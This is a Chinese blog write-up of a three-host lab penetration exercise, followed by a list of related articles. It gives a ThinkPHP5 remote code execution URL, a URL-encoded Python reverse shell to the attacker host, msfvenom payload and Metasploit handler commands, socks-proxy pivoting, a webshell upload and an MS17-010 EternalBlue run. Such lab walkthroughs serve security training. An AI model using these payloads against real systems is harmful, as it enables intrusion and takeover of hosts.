记一次从web到内网的渗透

简介: 记一次从web到内网的渗透

记一次从web到内网的渗透

拓扑图

图片

环境介绍

现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功获得三台主机权限

渗透过程

target1

使用nmap进行扫描

图片

可以看到开启了80端口 浏览器访问目标靶机80端口!
可以看到就是apache的默认页面 使用dirb进行目录结构扫描!
发现public页面

图片

可以看到是thinkphp5搭建的网站,thinkphp5曾经爆过一个远程代码执行的漏洞,直接上网站寻找payload验证是否存在漏洞

http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

图片

可以看到确实存在漏洞,现在可以向网站里面写入一句话木马,然后用蚁剑去连接,这是一种方法,但是也可以直接去尝试反弹一个shell到kali上

kali上执行:nc -lvvp 4444
浏览器中执行:http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.109.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);

可以看到kali这边成功反弹到了一个shell

图片

使用python生成一个交互式的shell
查找一下flag成功获得第一个flag 使用msfvenom生成一个反向的shellcode

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.109.128 lport=5555 -f elf > msf.elf

图片

使用python开启一个临时http服务

图片

靶机下载该shellcode

图片

然后kali打开msf,进行监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lport 5555
set lhost 192.168.109.128
exploit

然后靶机上给予shellcode执行的权限后执行该文件
可以看到kali这边成功返回一个meterpreter查看一下网络配置

图片

可以看到target1还存在一个网段 添加路由表

图片

配置socks代理

use auxiliary/server/socks_proxy
exploit

图片

配置proxychains代理链

vim /etc/proxychains4.conf

target2

扫描10.1.1.0/24这个网段是否还存在其他机器

use auxiliary/scanner/portscan/tcp
set rhosts 10.1.1.0/24
set ports 1-1000
set threads 50
exploit

图片

可以看到该网段还存在一台机器为10.1.1.150 使用nmap扫描10.1.1.150开放端口

proxychains4 nmap -Pn -sT 10.1.1.150

图片

可以看到也开放了80端口 这里直接用浏览器去访问10.1.1.150的80端口显然是不行的,不过火狐浏览器也是支持socks代理的,再次访问网站文件找到后台登入位置直接使用弱密码admin:admin登入成功

图片

成功获得第二个flag,找到模板位置,发现里面的源码都是可以编辑的

图片

写入一句话木马

图片

然后使用蚁剑去连接,当然直

接去连接肯定也是不行的,不过蚁剑也是支持代理设置的之后再正常去连接就行了,但是我这里不知道是环境问题还是蚁剑的问题,正常来说这里是肯定能连接成功的,我试了很多遍都没有成功,然后想着直接把那个页面里面的源码直接换为大马,也是不行的,因为一般大马都是经过作者编译过了,直接复制过去肯定会有问题,最后只能直接将大马事先准备在了网站根目录下面,这里主要是为了体现内网渗透,所以这里也不细说 访问大马使用msfvenom生成一个正向连接的shellcode

msfvenom -p windows/meterpreter/bind_tcp lport=6666 -f exe -o 1.exe

图片

然后通过大马将shellcode上传到目标服务器

图片

然后再次进入之前打开的msf

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set lport 6666
set rhost 10.1.1.150
exploit

图片

然后在大马上执行上传的shellcode可以看到kali这边成功返回了一个meterpreter

图片

查看网络配置

图片

可以看到还有一个网段10.1.2.0/24 将路由添加到路由表

run post/multi/manage/autoroute

图片

taget3

扫描10.1.2.0/24网段是否还存在其他机器

use auxiliary/scanner/portscan/tcp
set rhosts 10.1.2.0/24
set ports 1-1000
set threads 100
exploit

这里扫描实在太慢,这个网段还有一个机器IP为10.1.2.250 然后再添加一层socks代理

use auxiliary/server/socks_proxy
set srvport 2222
exploit

图片

配置proxychains代理链

vim /etc/proxychains4.conf

图片

使用nmap进行端口扫描

proxychains4 nmap -Pn -sT 10.1.2.250

根据扫描结果判断操作系统为windows 再使用nmap的漏扫脚本进行扫描

proxychains4 nmap --script=vuln 10.1.2.250

图片

可以看到存在ms17-010,直接上msf寻找攻击模块

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.1.2.250
exploit

图片

查找一下flag

图片

三台主机的权限全部那先,所有flag查找完毕,至此,渗透结束

目录
相关文章
|
监控 安全 JavaScript
【web渗透思路】框架敏感信息泄露(特点、目录、配置)
【web渗透思路】框架敏感信息泄露(特点、目录、配置)
719 0
【web渗透思路】框架敏感信息泄露(特点、目录、配置)
|
4月前
|
SQL 安全 测试技术
Web安全-渗透基础
Web安全-渗透基础
39 1
|
5月前
|
网络协议 NoSQL 网络安全
【Azure 应用服务】由Web App“无法连接数据库”而逐步分析到解析内网地址的办法(SQL和Redis开启private endpoint,只能通过内网访问,无法从公网访问的情况下)
【Azure 应用服务】由Web App“无法连接数据库”而逐步分析到解析内网地址的办法(SQL和Redis开启private endpoint,只能通过内网访问,无法从公网访问的情况下)
|
6月前
|
SQL 安全 中间件
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。 “渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。 根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面。
|
8月前
|
应用服务中间件 nginx
如何在树莓派部署Nginx并实现无公网ip远程访问内网制作的web网站
如何在树莓派部署Nginx并实现无公网ip远程访问内网制作的web网站
71 0
|
前端开发 安全 JavaScript
【web渗透思路】任意账号的注册、登录、重置、查看
【web渗透思路】任意账号的注册、登录、重置、查看
822 0
【web渗透思路】任意账号的注册、登录、重置、查看
|
XML SQL 安全
【web渗透思路】敏感信息泄露(网站+用户+服务器)
【web渗透思路】敏感信息泄露(网站+用户+服务器)
698 0
【web渗透思路】敏感信息泄露(网站+用户+服务器)
|
SQL 缓存 JavaScript
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
605 0
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
|
安全 项目管理
【web渗透】appscan 免费版下载
【web渗透】appscan 免费版下载
183 0
|
存储 安全 算法
web渗透听课笔记
web渗透听课笔记
102 0